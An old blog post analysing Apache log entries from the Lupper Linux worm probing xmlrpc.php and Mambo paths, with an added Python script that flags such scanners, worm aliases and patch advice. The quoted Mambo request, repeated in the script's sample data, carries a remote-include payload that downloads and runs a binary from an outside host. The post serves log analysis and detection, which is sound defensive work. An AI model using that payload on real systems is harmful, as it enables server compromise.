Wednesday, March 01, 2006

Log analysis: xmlrpc/xmlsrv 404 requests from a Linux worm

A not too uncommon entry in my Apache access log files. Exploit code has been out in the wild for
quite some time, yet security patching still has not caught up, even with the constant release of new malware.

This is a no-brainer. Host "infected-server-host" (I changed the IP to protect the innocent) is
running automated scripts (it might be manually operated as well) against possible targets, looking for the known xmlsrv, xmlrpc and mambo vulnerabilities. The first three lines show something interesting: a Mambo remote-include attempt carrying a shell command chain, followed by a burst of POSTs to every common xmlrpc.php location. Every request got a 404 here, so nothing on this server answered, but the source host is clearly compromised.

infected-server-host - - [23/Feb/2006:03:09:05 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:07 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:08 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:13 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:14 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:16 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:17 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:19 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:21 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:22 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:23 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
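Picking this pattern out of a busy access log by eye does not scale, so here is an added example (my own code, not something from the original post) that parses the combined-format lines above, tags the three indicators visible in them (POST to any xmlrpc.php location, a mosConfig_absolute_path pointing at a remote URL, and a cmd= parameter carrying a shell chain) and flags a source host as an automated scanner when it fires several indicators inside a short window. The eleven log lines are the ones from the post; the single 10.0.0.5 request is constructed as a benign control, and the 3-hits-in-60-seconds threshold is an assumption you should tune to your own traffic.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache "combined" log format. The request line is matched greedily so that a
# query string containing ';' or '|' (as in the Mambo line) is kept intact.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
XMLRPC_PATH = re.compile(r'/xmlrpc\.php$')

# Log lines copied from the post (hosts already masked there), plus one
# constructed benign request from 10.0.0.5 that must not be flagged.
SAMPLE_LOG = [
    'infected-server-host - - [23/Feb/2006:03:09:05 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:07 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:08 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:13 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:14 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:16 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:17 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:19 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:21 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:22 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    'infected-server-host - - [23/Feb/2006:03:09:23 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '10.0.0.5 - - [23/Feb/2006:03:10:00 +0100] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',  # constructed
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0]
    target = parts[1] if len(parts) > 1 else ""
    rec["path"], _, query = target.partition("?")
    rec["query"] = unquote(query)  # decode %20 etc. so the payload is readable
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return the set of indicator names a single request matches."""
    tags = set()
    if rec["method"] == "POST" and XMLRPC_PATH.search(rec["path"]):
        tags.add("xmlrpc-probe")  # hunting for the PHP XML-RPC code-injection bug
    q = rec["query"]
    if re.search(r"mosConfig_absolute_path=https?://", q):
        tags.add("mambo-rfi")  # Mambo config path pointed at a remote URL
    if re.search(r"(^|&)cmd=", q) and re.search(r"\b(wget|chmod)\b|;", q):
        tags.add("cmd-injection")  # shell command chain smuggled in a parameter
    return tags


def summarize(lines, min_hits=3, window_seconds=60):
    """Group suspicious requests per source host; thresholds are assumed values."""
    per_host = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            rec["tags"] = tags
            per_host[rec["host"]].append(rec)
    report = {}
    for host, recs in per_host.items():
        recs.sort(key=lambda r: r["time"])
        span = (recs[-1]["time"] - recs[0]["time"]).total_seconds()
        report[host] = {
            "hits": len(recs),
            "span_seconds": span,
            "tags": set().union(*(r["tags"] for r in recs)),
            "paths": sorted({r["path"] for r in recs}),
            "all_404": all(r["status"] == 404 for r in recs),  # nothing answered
            "automated": len(recs) >= min_hits and span <= window_seconds,
        }
    return report


if __name__ == "__main__":
    for host, info in summarize(SAMPLE_LOG).items():
        print(host, info)
```

A host whose every hit is a 404 did not get anywhere on this server, so the useful output is the source address to report upstream (and to rate-limit or block), not an incident on your own box. Run the same code over a real log with a higher min_hits if your site legitimately serves xmlrpc.php and you want to ignore ordinary clients.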


This worm is also known as
Linux/Lupper.worm.a [McAfee], Linux/Lupper.A [Computer Associates], Linux/Lupper.B [Computer Associates], Backdoor.Linux.Small.al [Kaspersky], Exploit.Linux.Lupii [ClamAV], ELF_LUPPER.A [Trend Micro].

The worm is trying to exploit the XML-RPC for PHP Remote Code Injection Vulnerability.
A list of vulnerable systems and complete information can be found at Security Focus
(Xoops, Wordpress, Ubuntu, Red Hat, SuSE).

Countermeasures: Upgrades are available for most applications that use XML-RPC. Check each application's official site for upgrades and patches.
